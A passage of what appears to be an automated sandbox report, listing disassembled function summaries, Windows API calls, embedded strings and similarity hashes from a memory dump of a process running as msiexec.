                                                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1470729244-0
                                                                                                                                                                                                          • Opcode ID: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                                                          • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061
• Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
• Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
• Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
• Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F

APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF

Strings

Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd

Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
• Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
• Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
• Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
• Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99

APIs

Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd

Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
• Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
• Opcode Fuzzy Hash: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
• Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE

APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562

Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd

Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
• Opcode ID: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
• Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
• Opcode Fuzzy Hash: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
• Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD

APIs
• GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
• free.MSVCRT ref: 0041822B

Strings

Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd

Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
• Opcode ID: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
• Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
• Opcode Fuzzy Hash: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
• Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D

APIs

Strings

Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd

Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
• Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
• Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59

Strings

Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd

Similarity
• API ID:
• String ID: foreign key constraint failed$new$oid$old
• API String ID: 0-1953309616
• Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
• Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
• Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65

APIs

Strings
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
• unknown column "%s" in foreign key definition, xrefs: 00431858
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD

Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd

Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
• Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99

APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
• memset.MSVCRT ref: 0040C4D0
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1265369119-0
                                                                                                                                                                                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                                          • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2241099983-0
                                                                                                                                                                                                          • Opcode ID: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                                                                                                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4053608372-0
                                                                                                                                                                                                          • Opcode ID: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                                          • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
